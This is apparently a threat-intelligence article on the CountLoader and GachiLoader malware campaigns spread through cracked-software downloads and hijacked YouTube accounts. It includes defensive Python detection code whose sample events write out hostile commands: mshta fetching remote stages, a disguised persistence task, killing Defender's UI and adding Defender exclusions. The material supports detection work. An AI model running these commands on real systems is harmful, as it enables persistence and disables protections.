Surprising fact: recent analysis shows that a single compromised distribution chain can infect hundreds of systems in Italy within days.
This introduction explains how cracked-software downloads and malicious YouTube tutorial videos have merged into an efficient infection funnel. Threat intelligence teams have disclosed details of a new campaign that uses MediaFire ZIP chains and a so-called “YouTube Ghost Network.”
Disclosures from Cyderes Howler Cell and Check Point reveal two loaders in play: one tracked since mid-2025 and a Node.js loader that uses heavy obfuscation and a novel PE injection technique. Both act as initial-access tools in multistage attacks that deliver information stealers such as ACR Stealer and Rhadamanthys.
The risk is real for consumers and enterprises across Europe, especially where Microsoft Word cracks and tutorial installers are popular. Signed-binary abuse, fileless execution, scheduled tasks, WMI checks, and Defender tampering all extend attacker dwell time.
Key Takeaways
- Cracked software and compromised video accounts form a robust infection vector targeting Italy.
- Cyderes Howler Cell and Check Point researchers disclosed details of the new campaign.
- Loaders serve as first-stage tools for persistence, evasion, and data theft.
- Distribution uses MediaFire ZIP chains and a YouTube Ghost Network of compromised accounts.
- Defender tampering, fileless methods, and PE injection make detection harder.
- Organizations should monitor indicators and apply mitigations tailored for local environments.
Breaking: Researchers warn of new multistage malware campaigns leveraging cracked software and YouTube
Analysts have reported a surge of linked, multistage campaigns that use popular download portals and hijacked content channels to deliver staged loaders at scale.
Researchers disclosed details of two parallel streams: one using cracked software distribution hubs and another leveraging a YouTube Ghost Network of 39 compromised accounts.
Threat teams note over 100 tutorial posts accumulated roughly 220,000 views since December 22, 2024, before many were removed. This reach shows how social trust boosts technical chains.
Key technical points:
- CountLoader 3.2 is staged via ZIP archives, a renamed Python interpreter, and a call to mshta.exe that launches persistent tasks.
- GachiLoader uses JavaScript/Node.js with heavy obfuscation and staged payload loading to evade analysis.
- Established threat intelligence teams, including Cyderes Howler Cell, analyzed the activity for rapid defensive guidance.
The campaigns highlight how new distribution tactics blend social engineering with technical evasion. Italian organizations that rely on popular installers or video guidance face heightened risk.
| Aspect | CountLoader 3.2 | GachiLoader |
|---|---|---|
| Primary vector | cracked software distribution portals | compromised video accounts |
| Technique | ZIP staging, renamed Python, mshta.exe | Node.js, heavy obfuscation, staged loaders |
| Scale observed | Active waves in download hubs | 39 accounts, ~220,000 views |
What happened: Timeline, scope, and who’s behind the disclosures

A coordinated timeline of activity shows two loader families operating in parallel across late 2024 and into 2025. This section summarizes key dates, scope, and the primary analysts who traced the chains.
Key dates and activity window
GachiLoader-linked posts appeared from December 22, 2024, and continued into 2025. CountLoader has been observed in the wild since at least June 2025, with the latest 3.2 wave active in mid-2025. These milestones provide the core activity window for defender timelines.
Research sources and attribution
Researchers disclosed details that map each distribution chain to its origin. Cyderes Howler Cell's research documents CountLoader's distribution and features, while Check Point's threat intelligence traced the channel-based loader's mechanics.
The analysts also described a trend toward modular, versioned loaders that act as first-stage scaffolding rather than final payloads. The reports trace CountLoader's initial-access route and show how operators used cracked software portals to redirect victims to encrypted MediaFire ZIPs and password-protected Word files.
Observers counted over 100 uploads and roughly 220,000 views across 39 compromised accounts, illustrating how videos spread the loader via social trust. These findings form a practical set of indicators defenders can use to track the new campaign and prioritize detection across Italian environments.
Cracked software distribution sites as a distribution vector
A common trap redirects users seeking free Office copies to MediaFire archives that conceal multi-layered loaders. This section shows how counterfeit installers become a stealthy distribution route in Italy.
From counterfeit Microsoft Word downloads to MediaFire ZIPs
Attackers publish counterfeit installers on forums and repo pages. Victims click links that lead to MediaFire-hosted ZIPs. The hosting gives an air of legitimacy and resists quick takedown.
Encrypted archives and renamed Python interpreter “Setup.exe”
The delivered ZIP uses a two-layer scheme: a plain archive contains an encrypted ZIP plus a Word doc with the password. Inside the decrypted archive is a renamed Python interpreter called Setup.exe.
That executable looks normal but runs a command to trigger further stages. Splitting artifacts across archives makes detection harder for perimeter scanners.
Abuse of mshta.exe for initial access and stealth
Setup.exe invokes a living-off-the-land binary to fetch the next payload. The chain calls mshta.exe to retrieve the loader from a remote host.
“Using trusted binaries and popular file-sharing links raises the chance that user-initiated downloads bypass controls.”
- The lure: counterfeit installers for legitimate apps steer users into attacker-controlled paths.
- Two-layer ZIP: plain ZIP → encrypted ZIP + passworded Word file.
- Renamed interpreter: Setup.exe triggers mshta.exe to fetch the staged loader.
- Mitigation points: block untrusted script hosts and restrict mshta.exe where not business-critical.
| Step | Artifact | Defensive signal |
|---|---|---|
| Initial lure | Counterfeit Word installer link | Untrusted download domains, forum referrals |
| Staging | Plain ZIP with encrypted ZIP + password.docx | ZIP within ZIP, passworded archive alerts |
| Execution | Renamed Python as Setup.exe → mshta.exe fetch | Unusual mshta.exe network calls, renamed interpreter execution |
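The staging pattern in the table above (plain ZIP, encrypted ZIP plus a Word file carrying the password, renamed Python interpreter) can be flagged statically before any payload runs. The following is an added example, not code from the Cyderes report: a small Python triage that walks a nested archive, records entries it cannot read because they are password-protected, pulls password candidates out of a companion .docx, and applies a string-scan heuristic for a PE that references a CPython runtime DLL under a name other than python.exe. The archive names, the `Office2024` password and the `python311.dll` marker are constructed for the demo; the "encryption" is emulated by setting the ZIP flag bit, as the comment explains.

```python
"""Static triage of the two-layer ZIP lure (plain ZIP -> encrypted ZIP +
password-carrying Word file -> renamed Python interpreter). Added example,
not from the Cyderes report; all archives below are constructed in memory."""
import io
import re
import zipfile

PY_DLL_RE = re.compile(rb"python3\d*\.dll", re.I)   # CPython runtime import string
DOCX_TEXT_RE = re.compile(r"<w:t[^>]*>([^<]*)</w:t>")
PASSWORD_RE = re.compile(r"pass(?:word|wd)?\s*[:=]?\s*(\S+)", re.I)
PYTHON_NAMES = {"python.exe", "pythonw.exe"}


def looks_like_renamed_python(name: str, data: bytes) -> bool:
    """PE that references a CPython DLL but is not named python(w).exe.
    Heuristic string scan, not a full PE import-table parse."""
    base = name.rsplit("/", 1)[-1].lower()
    return data[:2] == b"MZ" and bool(PY_DLL_RE.search(data)) and base not in PYTHON_NAMES


def docx_text(data: bytes) -> str:
    """Pull the visible text runs out of a .docx (itself a ZIP of XML)."""
    with zipfile.ZipFile(io.BytesIO(data)) as doc:
        xml = doc.read("word/document.xml").decode("utf-8", "replace")
    return " ".join(DOCX_TEXT_RE.findall(xml))


def triage_archive(blob: bytes, depth: int = 0) -> dict:
    """Walk an archive one nested layer at a time and report the staging signals."""
    report = {"nested_zips": [], "encrypted_entries": [], "password_candidates": [], "renamed_python": []}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            name, low = info.filename, info.filename.lower()
            if info.flag_bits & 0x1:          # encrypted: record it, cannot read it
                report["encrypted_entries"].append(name)
                continue
            data = zf.read(name)
            if low.endswith(".docx"):
                m = PASSWORD_RE.search(docx_text(data))
                if m:
                    report["password_candidates"].append(m.group(1))
            elif (low.endswith(".zip") or data[:2] == b"PK") and depth < 3:
                report["nested_zips"].append(name)
                inner = triage_archive(data, depth + 1)
                for key in ("nested_zips", "encrypted_entries", "renamed_python"):
                    report[key] += [f"{name}/{x}" for x in inner[key]]
                report["password_candidates"] += inner["password_candidates"]
            elif looks_like_renamed_python(name, data):
                report["renamed_python"].append(name)
    # Nested ZIP + entries we cannot scan + a password handed over in a document
    # is the lure's signature even before any payload is visible.
    report["staging_pattern"] = bool(report["nested_zips"] and report["encrypted_entries"]
                                     and report["password_candidates"])
    return report


def fake_encrypt(zip_bytes: bytes) -> bytes:
    """Demo shortcut: set the 'encrypted' general-purpose flag bit in every local
    (offset 6) and central-directory (offset 8) header so zipfile reports the
    entries as password-protected. The data is NOT actually encrypted."""
    buf = bytearray(zip_bytes)
    for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        i = buf.find(sig)
        while i != -1:
            buf[i + off] |= 0x01
            i = buf.find(sig, i + 4)
    return bytes(buf)


def make_docx(text: str) -> bytes:
    """Minimal .docx (only word/document.xml) carrying the text."""
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as d:
        d.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                   f"<w:body><w:p><w:r><w:t>{text}</w:t></w:r></w:p></w:body></w:document>")
    return out.getvalue()


def build_samples():
    """Return (outer lure ZIP, the inner ZIP as it looks once unlocked). Constructed."""
    fake_exe = b"MZ" + b"\x00" * 62 + b"python311.dll\x00"   # constructed PE stub
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w", zipfile.ZIP_STORED) as z:
        z.writestr("Setup.exe", fake_exe)
        z.writestr("stage.py", b"print('stage')\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_STORED) as z:
        z.writestr("Setup_2024.zip", fake_encrypt(inner.getvalue()))
        z.writestr("password.docx", make_docx("Archive password: Office2024"))
    return outer.getvalue(), inner.getvalue()


if __name__ == "__main__":
    outer, unlocked = build_samples()
    print(triage_archive(outer))      # staging_pattern True, payload still unreadable
    print(triage_archive(unlocked))   # renamed_python ['Setup.exe']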
CountLoader: a modular, stealthy loader evolving in the wild
CountLoader 3.2 acts as an initial, modular loader that orchestrates multistage delivery and evasion. It retrieves stages via mshta.exe and builds a persistent foothold designed to last years.
Version details and capabilities: CountLoader 3.2 feature set
This modular, stealthy release supports EXE and MSI payloads, DLLs invoked through rundll32.exe, and Python modules shipped inside ZIPs. It can run PowerShell purely in memory and launch remote content without writing payloads to disk.
Persistence via scheduled tasks mimicking GoogleTaskSystem
CountLoader uses a scheduled task named GoogleTaskSystem136.0.7023.12. The job runs every 30 minutes for up to ten years and uses a fallback domain to maintain connectivity.
Security-aware behavior: CrowdStrike Falcon checks via WMI
The loader queries WMI to detect CrowdStrike Falcon. If the agent is present, it alters invocation patterns to reduce noisy activity and avoid immediate termination.
Fileless execution paths: PowerShell, rundll32.exe, and MSI
Fileless options include in-memory PowerShell, mshta-hosted scripts, and DLL injection via rundll32. These paths minimize disk artifacts and complicate forensic traces.
“Observed chains culminate in data-stealing payloads; defenders must watch for scheduled-task anomalies and mshta network calls.”
- USB propagation: malicious LNK files placed next to hidden originals invoke mshta with C2 parameters.
- Host profiling: the loader gathers system inventory to tailor delivery of additional malware families.
- Cleanup: it can remove its scheduled task to erase traces if instructed.
| Feature | Behavior | Defensive signal |
|---|---|---|
| Persistence | GoogleTaskSystem136.0.7023.12, 30-min interval, 10-year TTL | Unusual scheduled task name, long lifetime |
| Security checks | WMI queries for CrowdStrike Falcon; adaptive commands | WMI calls to security products, modified task invocation |
| Execution methods | EXE, MSI, DLL via rundll32, in-memory PowerShell, mshta | No disk writes, mshta network fetches, rundll32 launching unsigned DLLs |
| Propagation | USB LNK chain invoking mshta with C2 | Autorun-like LNKs, unexpected mshta launches from removable media |
Operational note: observed campaigns using this loader often delivered ACR Stealer as the final payload. Italian organizations handling regulated data should prioritize layered detection and controls for living-off-the-land binaries and removable media.
YouTube Ghost Network delivers GachiLoader via compromised accounts
A covert network of hijacked channels has pushed installer guides that embed malicious links into trusted descriptions.
Check Point documented a Node.js loader distributed through over 100 uploads across 39 compromised accounts. The set of posts reached about 220,000 views since December 22, 2024.
Scale of exposure
Attackers seeded descriptions with short-lived links to staged hosts. Many viewers followed the links seeking quick fixes, increasing reach in Italy where tutorial content is widely trusted.
Technical profile
GachiLoader uses heavy obfuscation and anti-analysis checks to resist sandboxes. It runs Node.js processes that appear benign but perform stealthy tasks.
Escalation and tampering
The loader attempts privilege escalation using net session checks and UAC prompts. Operators also terminate SecHealthUI.exe and set Defender exclusions for paths such as C:\Users\ and C:\ProgramData\.
“In some cases an intermediate module (kidkadi.node) loads payloads via Vectored Exception Handling-based PE injection.”
- Final stage: direct payload download or intermediate VEH-based loader.
- Observed payload: Rhadamanthys info‑stealer in at least one delivery.
- Detection focus: browser referral patterns, short-lived links, and unusual Node.js processes.
| Aspect | Observed behavior | Defensive signal |
|---|---|---|
| Distribution | 100+ posts from 39 accounts, ~220,000 views | Surge in external referrals from video descriptions |
| Loader tech | Node.js, heavy obfuscation, anti-analysis | Unusual node.exe instances, packed JS files |
| Persistence & tamper | UAC prompts, SecHealthUI.exe termination, Defender exclusions | Changed Defender exclusions, process terminations in logs |
Novel techniques: Vectored Exception Handling and PE injection chains

Security teams are now seeing injection chains that hijack exception handlers to load hidden PE payloads at runtime.
How it works: attackers trigger a legitimate DLL load, then use Vectored Exception Handling (VEH) to intercept the process flow. The handler maps a malicious PE into memory and swaps the original module on-the-fly.
Kidkadi second-stage and DLL swap on-the-fly
Check Point highlighted a variant that drops a node-based second stage named kidkadi.node.
This module loads a trusted DLL, then uses VEH to replace it with a hostile payload. The swap happens in memory, so static file scanners see only the original file.
Signed binary abuse and evasion trends security teams must track
Cyderes reported a trend toward signed-binary abuse and fileless execution as part of the new modular loader pattern.
Both loader families use living-off-the-land binaries like mshta.exe and PowerShell to deliver additional stages. This reduces disk artifacts and hinders EDR telemetry.
“VEH-based injection and on-the-fly DLL swaps complicate forensic analysis and blunt signature defenses.”
- kidkadi.node acts as the intermediary for runtime injection.
- DLL swap at load time bypasses static integrity checks.
- Multistage access lets operators swap final payloads rapidly.
- SOCs in Italy should favor behavior analytics over hash-based controls.
| Technique | Why it evades | Detection tip |
|---|---|---|
| VEH PE injection | No disk write; loads in memory | Monitor rare exception handler registrations |
| Signed-binary abuse | Trusted binary appears legitimate | Track abnormal child processes for mshta.exe and node.exe |
| On-the-fly DLL swap | Static scanners miss replaced module | Watch DLL load anomalies and mismatched module hashes |
Action: test defenses against memory injection, harden DLL load paths, and log unusual error-handling flows on hosts that fetch content from distribution sites. These steps help counter the stealthy loaders described in the new reports and lower the risk from cracked-software lures.
Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware
A dual-path campaign used trusted file hosts and compromised video accounts to seed staged loaders that enable long-term access.
Cyderes Howler Cell and Check Point documented two delivery streams: one via counterfeit download hubs and another via a Ghost Network of hijacked channels. Both pipelines deploy modular loaders that establish multistage access and later fetch additional malware.
Each loader plays a role: initial access, persistence, evasion, and final payload delivery. Operators mix mshta.exe calls, in-memory PowerShell, and VEH-driven PE injection to avoid disk traces.
Detection anchors include unusual scheduled task names, mshta invocation strings, and Defender exclusion changes. These artifacts give SOCs practical signals to hunt on.
“Timely threat intelligence is critical; newly disclosed details from research teams help map behavior to alerts.”
- Two-pronged distribution: file-host links and hijacked channel descriptions.
- Loaders are flexible—operators can swap ACR Stealer, Rhadamanthys, or other payloads.
- Trusted binaries and fileless methods are common across both campaigns.
| Vector | Technique | Key detection |
|---|---|---|
| Download hubs | ZIP staging, renamed interpreter, mshta fetch | Passworded archives, mshta network calls, odd task names |
| Hijacked channels | Short-lived links, Node.js loader, VEH injection | Unusual node.exe instances, modified Defender exclusions |
| Common traits | Fileless execution, persistence, payload flexibility | WMI checks for EDR, scheduled-task anomalies, in-memory indicators |
For Italian organizations, the risk intersects GDPR obligations and operational continuity. Human behavior—seeking free tools and following tutorials—remains the primary enabler.
Next: the article will dive into toolchains and payload families, and offer detection and mitigation steps tailored for Europe and Italy.
Toolchain and payloads: from initial tool to additional malware families

Early-stage loaders act like gatekeepers, choosing follow‑on payloads after profiling a system. The loader performs quick host checks and then requests the most profitable follow-up modules from the operator.
ACR Stealer, Rhadamanthys, and other loader-delivered payloads
ACR Stealer is a data-harvesting payload observed after host profiling on infected machines. It exfiltrates credentials, browser stores, and local tokens for resale or account takeover.
Rhadamanthys appears in deliveries tied to a Node.js loader. It focuses on information theft and credential collection for immediate monetization.
“Operators match payloads to system value: data thieves for rich endpoints, lighter tools for broader reach.”
USB propagation through malicious LNK alongside hidden originals
CountLoader, which handles removable-media propagation, creates malicious LNK files next to the hidden originals. Each LNK runs the legitimate file while invoking mshta.exe with C2 parameters to fetch the loader.
This trick widens infections beyond a single host and targets small offices where USB sharing is common.
- Modular execution paths include EXE, DLL, MSI, and Python modules to maximize flexibility.
- Removing scheduled tasks helps attackers blend into normal churn and hinders incident response.
- Payload choice ties to monetization: stolen data can be sold, or later stages can enable ransomware.
| Stage | Observed behavior | Detection tip |
|---|---|---|
| Profiling | Host checks for AV, user role, installed apps | Unusual WMI queries, abnormal process trees |
| Payload delivery | ACR Stealer, Rhadamanthys, other malware families | Data‑exfiltration spikes, new outbound TLS hosts |
| Propagation | USB LNK next to hidden originals invoking mshta.exe | New .lnk files on removable media, mshta.exe with unexpected args |
| Persistence | Scheduled tasks that can be removed after use | Correlate task creation with USB events and EDR alerts |
Defender note: baseline LNK behavior, monitor mshta invocations, and correlate EDR telemetry with USB insertion and new scheduled tasks to detect this modular toolchain early.
Impact and risk to Europe with a focus on Italy
In Italy, recent incidents show how simple tutorial links and shared archives can produce long-term intrusions that affect privacy, operations, and compliance.
Data theft and regulatory exposure: information stealers such as ACR Stealer and Rhadamanthys put personal data, client records, and intellectual property at risk. Loss of confidential records can trigger GDPR breach notifications and fines.
Operational disruption: loaders that set Defender exclusions or maintain stealthy persistence extend dwell time. Prolonged access increases the chance of follow-on ransomware, espionage modules, or mass exfiltration.
Where the risk concentrates
- Shared devices and USB propagation raise outbreak risk in small offices and manufacturing shops.
- Public administration and professional services that rely on Office workflows face higher exposure from software distribution sites and tutorial links.
- Third-party contractors following risky guides can import threats into otherwise secure networks.
Actionable priorities for Italian organizations
Map how stolen data affects GDPR scope, harden controls for living‑off‑the‑land binaries, and feed the disclosed campaign details into SIEM rules. Prioritize hunting for unusual scheduled tasks, mshta/network beacons, and unexpected node.exe and renamed Python processes to reduce mean time to detect.
“Align risk assessments to observed TTPs, not generic checklists, to lower regulatory and reputational harm.”
| Risk | Effect | Immediate action |
|---|---|---|
| Data theft | GDPR exposure, fines | Encrypt sensitive stores, monitor exfiltration |
| Persistence | Long dwell time | Hunt scheduled tasks, Defender exclusions |
| USB propagation | Operational outages | Restrict removable media, scan on insert |
Detection priorities: indicators, behaviors, and telemetry to monitor

Detecting early-stage loader behavior depends on spotting a handful of repeatable host and network patterns.
Start with immediate, high-value signals that map to the details the new reports provide. Focused monitoring reduces noise and cuts dwell time in Italy.
Watch for mshta.exe, scheduled task anomalies, and network beacons
- mshta.exe invocation: alert on mshta.exe fetching external URLs or running script hosts from inherited scheduled‑task command lines.
- Scheduled task fingerprints: hunt for creations like GoogleTaskSystem136.0.7023.12, long lifetimes, or 30‑minute cadences.
- Network beacons: flag periodic outbound TLS/HTTP requests that align with scheduled task timing or unusual domains.
Host profiling artifacts, ZIP-based staging, and pythonized loaders
- Baseline WMI queries that enumerate AV (look for CrowdStrike Falcon checks) and alert on spikes.
- Correlate ZIP extraction events with immediate mshta or script host launches; renamed Python interpreters like “Setup.exe” deserve special scrutiny.
- Track Node.js processes spawning system utilities or making odd network calls; kidkadi.node and VEH-based PE injection require EDR in-memory capture.
“Enrich SIEM with campaign strings, suspicious task names, and file paths to speed detection and response.”
| Signal | Why it matters | Action |
|---|---|---|
| mshta.exe network call | Initial fetch for staged loaders | Block / alert on external hosts |
| Google-like scheduled task | Persistent cadence, long TTL | Investigate and quarantine host |
| WMI AV enumeration | Host profiling step | Alert and correlate with process tree |
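The signals in this section (and the USB LNK correlation from the toolchain section above) can be expressed as a handful of rules over endpoint telemetry. The following is an added example, not from the Cyderes or Check Point reports: a Python triage function that runs Sysmon-style process-creation (EventID 1) and file-creation (EventID 11) events plus a Defender configuration-change event (5007) through rules for mshta.exe remote fetches, the renamed interpreter, the GoogleTaskSystem task name and 30-minute cadence, WMI security-product enumeration, node.exe spawning system utilities, Defender exclusion changes, and .lnk files written to removable media. The event dictionaries, user paths, command lines and the `example.invalid` host are constructed for the demo; field names follow Sysmon's `Image`, `CommandLine`, `ParentImage`, `OriginalFileName`, `CurrentDirectory` and `TargetFilename`. Treating everything outside C:\ as removable media is a deliberate simplification.

```python
"""Behaviour-based triage of Sysmon-style endpoint events for the loader
tradecraft in this article. Added example: event shapes, paths, command
lines and the example.invalid host are constructed for the demo and are
not indicators from the Cyderes or Check Point reports."""
import re

# Child processes a Node.js loader has no business spawning.
LOLBIN_CHILDREN = {"cmd.exe", "powershell.exe", "net.exe", "taskkill.exe",
                   "mshta.exe", "rundll32.exe", "schtasks.exe", "wmic.exe"}
PYTHON_ORIGINALS = {"python.exe", "pythonw.exe"}
URL_RE = re.compile(r"https?://", re.I)
# Task name from the report (GoogleTaskSystem + Chrome-like version) or its 30-minute cadence.
TASK_RE = re.compile(r"GoogleTaskSystem[\d.]*|/sc\s+minute\s+/mo\s+30\b", re.I)
# WMI/CIM security-product enumeration, including a CrowdStrike Falcon check (coarse on purpose).
AV_ENUM_RE = re.compile(r"SecurityCenter2|AntiVirusProduct|CSFalcon|CrowdStrike", re.I)
# Defender exclusion changes via the registry path in event 5007 text or via PowerShell.
EXCLUSION_RE = re.compile(r"Exclusions\\(Paths|Processes|Extensions)|Add-MpPreference\s+-Exclusion", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def on_system_drive(path: str) -> bool:
    """Heuristic: anything outside C:\\ is treated as removable or secondary media."""
    return path.upper().startswith("C:\\")


def triage(event: dict) -> list:
    """Return the names of every rule the event trips (empty list = clean)."""
    hits = []
    img = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    parent = basename(event.get("ParentImage", ""))
    cwd = event.get("CurrentDirectory") or "C:\\"
    if img == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_fetch")
    if img == "mshta.exe" and not on_system_drive(cwd):
        hits.append("mshta_from_removable_media")
    if event.get("OriginalFileName", "").lower() in PYTHON_ORIGINALS and img not in PYTHON_ORIGINALS:
        hits.append("renamed_python_interpreter")     # version info says python.exe, name says otherwise
    if img == "schtasks.exe" and TASK_RE.search(cmd):
        hits.append("suspicious_scheduled_task")
    if AV_ENUM_RE.search(cmd):
        hits.append("security_product_enumeration")
    if parent == "node.exe" and img in LOLBIN_CHILDREN:
        hits.append("node_spawns_system_utility")
    if EXCLUSION_RE.search(event.get("Message", "")) or EXCLUSION_RE.search(cmd):
        hits.append("defender_exclusion_change")
    target = event.get("TargetFilename", "")
    if event.get("EventID") == 11 and target.lower().endswith(".lnk") and not on_system_drive(target):
        hits.append("lnk_created_on_removable_media")
    return hits


def summarize(events) -> dict:
    """Count rule hits across a batch of events (what a SIEM dashboard would show)."""
    counts = {}
    for ev in events:
        for rule in triage(ev):
            counts[rule] = counts.get(rule, 0) + 1
    return counts


# Constructed sample events in Sysmon field naming plus one Defender event 5007.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\mario\Downloads\Setup.exe",
     "OriginalFileName": "python.exe", "CommandLine": "Setup.exe stage.py"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Users\mario\Downloads\Setup.exe",
     "CommandLine": "mshta.exe https://example.invalid/stage",
     "CurrentDirectory": r"C:\Users\mario\Downloads"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": 'schtasks /create /tn GoogleTaskSystem136.0.7023.12 /sc minute /mo 30 /tr "mshta https://example.invalid/t"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct"},
    {"EventID": 1, "Image": r"C:\Windows\System32\taskkill.exe",
     "ParentImage": r"C:\Users\mario\AppData\Local\Temp\node.exe",
     "CommandLine": "taskkill /F /IM SecHealthUI.exe"},
    {"EventID": 5007, "Message": r"Windows Defender configuration has changed. New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\ = 0x0"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/u", "CurrentDirectory": "E:\\"},
    {"EventID": 11, "Image": r"C:\Users\mario\Downloads\Setup.exe", "TargetFilename": r"E:\Invoices.lnk"},
    # Benign controls: a local .hta and the real interpreter under its own name.
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\help.hta"', "CurrentDirectory": r"C:\Program Files\Vendor"},
    {"EventID": 1, "Image": r"C:\Python311\python.exe", "OriginalFileName": "python.exe", "CommandLine": "python.exe app.py"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev), ev.get("CommandLine") or ev.get("Message") or ev.get("TargetFilename"))
    print(summarize(SAMPLE_EVENTS))
```

Each rule is a single, explainable condition, which keeps false-positive review cheap; in production the `security_product_enumeration` and removable-media heuristics would need an allowlist (legitimate EDR installers, fixed secondary drives) before they are promoted from hunting queries to alerts.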
Mitigation and response: practical steps for organizations and users
Focus on practical fixes that close common abuse paths for living-off-the-land binaries and removable media.
Application whitelisting prevents renamed interpreters and unknown launches. Restrict mshta.exe, PowerShell, and rundll32.exe to approved workflows. Use allowlists that block executables with unusual names such as renamed Python builds.
EDR with fileless detection helps catch in-memory execution, VEH-based injection, and script-host abuse. Configure alerts for Defender exclusion changes and node.exe processes that spawn system utilities.
Control removable media to stop USB LNK chains. Disable autorun, scan link files at insertion, and limit write access to system paths. Enforce MFA and least-privilege roles to reduce privilege escalation success.
Operational playbooks and network controls
- Build SOC playbooks to triage mshta-invoked network calls, odd scheduled tasks, and node.js anomalies.
- Use egress filtering and DNS monitoring to block C2 hosts used by the multistage loader chains.
- Patch endpoints and security tools quickly; keep quarantine workflows ready for any newly reported stealthy loader.
“Close the easiest doors first: restrict LOLBins, lock removable media, and let behavioral EDR hunt in-memory threats.”
| Control | Why it matters | Immediate action |
|---|---|---|
| Application allowlist | Stops renamed interpreters and unauthorized EXEs | Block unknown Setup.exe variants and enforce signed-only rules |
| Behavioral EDR | Detects fileless execution and PE injection | Enable memory scanning and VEH/PowerShell heuristics |
| Removable media policy | Prevents USB LNK propagation | Disable autorun, scan on insert, limit write paths |
| Identity & network | Reduces escalation and C2 reach | Require MFA, restrict privileges, apply egress/DNS filtering |
Next steps: coordinate with threat intelligence, such as the Cyderes Howler Cell reports, to update detections for additional malware and keep blocklists current.
Conclusion
Two parallel distribution ecosystems now funnel staged loaders into widely used host networks in Europe.
The reports provide clear details of the new campaign's behavior: CountLoader 3.2 and GachiLoader leverage cracked software portals and a Ghost Network of hijacked channels to deliver info‑stealers like ACR Stealer and Rhadamanthys. Techniques include mshta‑initiated downloads, scheduled‑task persistence, Defender exclusion changes, USB LNK propagation, and VEH‑based PE injection.
Defenders in Italy should prioritize behavioral detection: alert on mshta network calls, hunt odd scheduled‑task names, watch for Defender tampering, and flag unexpected node/python processes. Harden LOLBins, restrict removable media, and deploy behavior‑focused EDR to detect fileless execution.
Howler Cell research and other intelligence must feed SIEM rules and tests. Simulate these TTPs, validate logging, and align SOC, IT, and leadership to keep layered defenses ahead of evolving threats.
FAQ
What are the main threats described in the recent disclosures?
Researchers have documented a multistage campaign that uses pirated application installers and compromised video platform accounts to deliver a modular loader and follow-on payloads. The campaign begins with poisoned archives and installers that execute living-off-the-land binaries, then hands off to a stealthy loader which deploys data thieves and backdoors.
Who published the research and what intelligence sources were cited?
The analysis draws on work by incident responders and threat intelligence teams, including Cyderes Howler Cell and Check Point, which provided telemetry, sample analysis, and reporting on activity observed across 2024–2025.
How are fake installers and archive hosts being abused for initial access?
Threat actors place tampered installers on file hosting and mirror sites, rename runtime interpreters to executable installers, and use encrypted ZIPs. They also leverage mshta.exe and other legitimate tools to execute embedded scripts and drop the next-stage loader without writing obvious executables.
What capabilities does the loader exhibit in the wild?
The loader is modular and stealthy. It supports fileless techniques through PowerShell and rundll32.exe, persistence via scheduled tasks that mimic legitimate system tasks, and environment checks to evade analysis. It can fetch additional malware families after gaining a foothold.
How were video platform accounts used in the campaign?
Compromised creator accounts hosted dozens of videos that linked to malicious installers. The campaign used many accounts to increase reach and avoid rapid takedown, resulting in significant view counts and extensive exposure before detection and remediation.
What novel evasion techniques should defenders be aware of?
Defenders should watch for vectored exception handling abuse, on-the-fly DLL swaps, and signed-binary misuse. The chain may include layered PE injections and anti-analysis checks that skip execution when common security products are present.
Which payloads and secondary tools have been observed after the loader runs?
Analysts observed credential and data stealers, infostealers targeting browsers and system artifacts, and bespoke backdoors. There are also reports of tools that propagate via removable media using malicious shortcuts alongside hidden original files.
What are the primary detection indicators teams can monitor?
Monitor mshta.exe invocation patterns, unusual scheduled task names that imitate system services, unexpected network beacons to cloud storage or C2 domains, a Python runtime renamed Setup.exe, and archives that contain renamed interpreters or obfuscated loaders.
What immediate mitigation steps should organizations take?
Apply application allowlisting, restrict use of living-off-the-land binaries where feasible, enable EDR features that detect fileless execution, enforce removable media controls, and require multifactor authentication for accounts tied to publishing platforms and developers.
How can end users reduce personal risk from these attacks?
Avoid downloading pirated installers or tools from untrusted sites. Verify publisher sources, scan archives before extraction, enable platform account protections, and keep endpoint security up to date. When in doubt, obtain software directly from vendors or reputable stores.
Are specific regions or sectors more at risk?
The campaign shows notable exposure in Europe, with incident responders highlighting impacts in Italy. Organizations that handle regulated personal data face elevated GDPR and operational risk if infected.
What telemetry should security teams collect to investigate potential infections?
Collect process creation logs (especially for mshta.exe, rundll32.exe, and PowerShell), scheduled task listings, network connection logs to cloud storage and uncommon domains, file system artifacts of staged ZIPs, and indicators from EDR showing in-memory injections or DLL swaps.
How do attackers try to disable or evade endpoint protections?
Observed techniques include attempts to disable built-in defenders, create exclusions, check for EDR products via WMI queries, and abort execution when sandbox or analysis conditions appear. Attackers also leverage signed binaries to blend with legitimate activity.
Should organizations remove all instances of pirated installers from their environments?
Yes. Removing unlicensed and unknown installers lowers exposure. Replace such files with vendor-supplied installers, scan archived content before use, and enforce policies that block downloads from untrusted hosting sites and mirrors.